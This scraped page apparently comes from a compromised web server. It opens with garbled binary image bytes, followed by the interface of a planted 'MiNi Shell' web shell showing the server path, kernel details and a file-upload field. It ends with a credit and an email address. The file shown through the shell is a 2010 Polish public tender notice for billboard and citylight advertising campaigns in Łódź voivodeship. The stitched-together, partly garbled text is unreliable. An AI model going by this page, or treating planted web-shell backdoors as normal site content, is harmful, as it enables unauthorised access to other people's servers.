JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100517/132860-N-2010.html

<p class="kh_header"><b>Łódź: Przeprowadzenie kampanii promocyjnych 
Departamentu ds. PO Kapitał Ludzki na nośnikach typu  
citylight i billboard na terenie Województwa Łódzkiego</b><br>
<b>Numer ogłoszenia: 132860 - 2010; data zamieszczenia: 17.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo  Łódzkie , al. Piłsudskiego 8, 90-051 Łódź, woj. łódzkie, tel. 042 6633385, 6633384, faks 042 6633391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lodzkie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kampanii promocyjnych 
Departamentu ds. PO Kapitał Ludzki na nośnikach typu  
citylight i billboard na terenie Województwa Łódzkiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia   jest   przeprowadzenie kampanii promocyjnych Departamentu ds. PO Kapitał Ludzki z podziałem na 2 zadania:
Zadanie nr 1	
Przygotowanie, druk i realizacja kampanii reklamowej Programu Operacyjnego Kapitał Ludzki na nośnikach typu citylight na terenie Województwa Łódzkiego, polegające na:
a)Druku plakatów dla nośników typu citylight, format netto: ok. 180 x 120 cm, kolorystyka: 4+0, surowiec: minimum 175 g/m2, w łącznym nakładzie 240 egzemplarzy, druk z poddrukiem, wg czterech projektów graficznych po 60 plakatów każdy, dostarczonych przez Zamawiającego na 20 dni przed rozpoczęciem kampanii.
b)Ekspozycji plakatów na nośnikach typu citylight na przystankach komunikacji miejskiej na terenie miasta Łodzi, podzielonych na dwie odrębne kampanie trwające po 28 dni każda, po 100 nośników każda,  po dwa projekty graficzne na jedną kampanię.
c)Minimum 60% plakatów będzie eksponowanych na następujących liniach komunikacyjnych miasta: - 1. Pabianicka, Piotrkowska, Kościuszki, Zachodnia, Zgierska, 2. - Mickiewicza, al. Piłsudskiego, 3. - al. Włókniarzy, Jana Pawła II, 4. - Narutowicza, Zielona, Konstantynowska, 6. - Wojska Polskiego, Kilińskiego, Rzgowska, 7. - Limanowskiego, Aleksandrowska, 8. - Felińskiego, Broniewskiego, 9. - al. Politechniki, Gdańska.
d)Ekspozycja tych samych plakatów nie może być zlokalizowana na tych samych przystankach i na kolejnych przystankach danej linii w jednym kierunku częściej niż co drugi przystanek.


Zadanie nr 2	
Przygotowanie, druk i realizacja kampanii reklamowej Programu Operacyjnego Kapitał Ludzki na nośnikach typu billboard na terenie Województwa Łódzkiego, polegające na:
Przygotowanie, druk i realizacja kampanii reklamowej Programu Operacyjnego Kapitał Ludzki na nośnikach typu billboard na terenie Województwa Łódzkiego, polegające na:
a)Druku plakatów dla nośników typu billboard 12 m2, w łącznym nakładzie 240 egzemplarzy, wg czterech projektów graficznych po 60 plakatów każdy, dostarczonych przez Zamawiającego na 20 dni przed rozpoczęciem kampanii.
b)Ekspozycji plakatów promujących PO Kapitał Ludzki na nośnikach zewnętrznych typu billboard w największych miastach województwa łódzkiego, podzielonych na dwie odrębne kampanie trwające po 14 dni każda, po  100 billboardów każda, po dwa projekty graficzne na jedną kampanię, w tym:- Lokalizacja A: 50 billboardów na terenie Łodzi - Lokalizacja B: 50 billboardów na terenie minimum 10 największych miast województwa łódzkiego powyżej 20 tys. mieszkańców lub na drogach dojazdowych do nich, nie dalej niż 1 km od granicy miasta.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.14.00-0, 79.80.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wprowadza obowiązku wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- W zakresie Zadania nr 1 Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał/zakończył jedną usługę  polegającą na druku i ekspozycji plakatów na nośnikach typu citylight w ramach jednego zamówienia o wartości nie mniejszej niż 40.000 zł (brutto) oraz że w/w usługa została wykonana należycie.
- W zakresie Zadania nr 2 Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał/zakończył jedną usługę  polegającą na druku i ekspozycji plakatów na nośnikach typu billboard w ramach jednego zamówienia o wartości nie mniejszej niż 40.000 zł (brutto) oraz że w/w usługa została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lodzkie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski w Łodzi
Departament Organizacyjny
Wydział ds. Zamówień Publicznych
al. Piłsudskiego 8, 90-051 Łódź
pok.406a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2010 godzina 10:00, miejsce: Urząd Marszałkowski w Łodzi
Departament Organizacyjny
Wydział ds. Zamówień Publicznych
al. Piłsudskiego 8, 90-051 Łódź
pok.403 (kancelaria ogólna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będące przedmiotem niniejszego postępowania jest współfinansowane ze środków unijnych w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przygotowanie, druk i realizacja kampanii reklamowej Programu Operacyjnego Kapitał Ludzki na nośnikach typu citylight na terenie Województwa Łódzkiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie, druk i realizacja kampanii reklamowej Programu Operacyjnego Kapitał Ludzki na nośnikach typu citylight na terenie Województwa Łódzkiego, polegające na:
a)Druku plakatów dla nośników typu citylight, format netto: ok. 180 x 120 cm, kolorystyka: 4+0, surowiec: minimum 175 g/m2, w łącznym nakładzie 240 egzemplarzy, druk z poddrukiem, wg czterech projektów graficznych po 60 plakatów każdy, dostarczonych przez Zamawiającego na 20 dni przed rozpoczęciem kampanii.
b)Ekspozycji plakatów na nośnikach typu citylight na przystankach komunikacji miejskiej na terenie miasta Łodzi, podzielonych na dwie odrębne kampanie trwające po 28 dni każda, po 100 nośników każda,  po dwa projekty graficzne na jedną kampanię.
c)Minimum 60% plakatów będzie eksponowanych na następujących liniach komunikacyjnych miasta: - 1. Pabianicka, Piotrkowska, Kościuszki, Zachodnia, Zgierska, 2. - Mickiewicza, al. Piłsudskiego, 3. - al. Włókniarzy, Jana Pawła II, 4. - Narutowicza, Zielona, Konstantynowska, 6. - Wojska Polskiego, Kilińskiego, Rzgowska, 7. - Limanowskiego, Aleksandrowska, 8. - Felińskiego, Broniewskiego, 9. - al. Politechniki, Gdańska.
d)Ekspozycja tych samych plakatów nie może być zlokalizowana na tych samych przystankach i na kolejnych przystankach danej linii w jednym kierunku częściej niż co drugi przystanek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.14.00-0, 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie, druk i realizacja kampanii reklamowej Programu Operacyjnego Kapitał Ludzki na nośnikach typu billboard na terenie Województwa Łódzkiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie, druk i realizacja kampanii reklamowej Programu Operacyjnego Kapitał Ludzki na nośnikach typu billboard na terenie Województwa Łódzkiego, polegające na:
a)Druku plakatów dla nośników typu billboard 12 m2, w łącznym nakładzie 240 egzemplarzy, wg czterech projektów graficznych po 60 plakatów każdy, dostarczonych przez Zamawiającego na 20 dni przed rozpoczęciem kampanii.
b)Ekspozycji plakatów promujących PO Kapitał Ludzki na nośnikach zewnętrznych typu billboard w największych miastach województwa łódzkiego, podzielonych na dwie odrębne kampanie trwające po 14 dni każda, po  100 billboardów każda, po dwa projekty graficzne na jedną kampanię, w tym:- Lokalizacja A: 50 billboardów na terenie Łodzi - Lokalizacja B: 50 billboardów na terenie minimum 10 największych miast województwa łódzkiego powyżej 20 tys. mieszkańców lub na drogach dojazdowych do nich, nie dalej niż 1 km od granicy miasta.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.14.00-0, 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com